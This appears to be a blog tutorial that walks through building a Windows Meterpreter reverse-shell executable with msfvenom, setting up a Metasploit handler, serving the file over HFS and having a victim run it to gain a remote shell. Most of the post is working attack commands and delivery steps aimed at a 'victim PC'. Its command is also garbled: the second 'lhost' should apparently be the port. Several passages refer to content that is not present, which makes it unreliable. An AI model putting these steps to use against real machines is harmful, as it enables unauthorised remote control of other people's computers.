- Ethical Hacking
- Social Media
- Penetration Testing
-
Trending
.Net Interview Level
Programming
Interview Question
- MetaSploit
- Linux
Metasploits Web Delivery Script is a versatile module that creates a server on the attacking machine which hosts a payload. When the victim connects to the attacking server, the payload will be executed on the victim machine.
MSfVenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance.
The advantages of MSfVenom are:
Step 1 : First get your ip address with ifconfig command
Step 2 : Type MSfVenom Command To create a Exe Payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.132 lhost=4466 -f exe > /root/Desktop/HackWindow.exe
Check File at Desktop
Step 3 : Open MetaSploit with msfconsole command
Step 4 : use exploit/multi/handler
Step 5 : set payload windows/meterpreter/reverse_tcp
Step 6 : Type Lhost[Kali IP Address as per step 1] and lport same similiar as MSfvenom payload
Next, we need to set the LHOST and LPORT exactly like we did with the Unix/Linux/OS X web delivery exploit.
Step 7 : run
Step 8 : Share a file with HFS (HTTP file Sever)
HFS(HTTP file Sever) is default installed in Latest kali linux,if not installed,visit our article
How to send or receive files in Kali Linux - Using HFS(HTTP File Server)
Step 9 : Open the Kali Linux ip on victim PC (Window PC/target PC) in browser.
Step 10 : Download the file and run it.
Step 11 : When you run the file on victim PC ,they will be Hacked by you on Kali Linux(Sessions will come on terminal)
A meterpreter session open!
Step 12 : Now type, sessions to list the active sessions
Step 13 : Connect to it with sessions 1
Step 14 : We now have a full Meterpreter shell to the target.Now the session has opened type sysinfo to get system information
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.
And type shell to enter into Victims command prompt.
Akash is a co-founder and an aspiring entrepreneur who keeps a close eye on open source, tech giants, and security. Get in touch with him by sending an email (akashchugh1994@gmail.com).
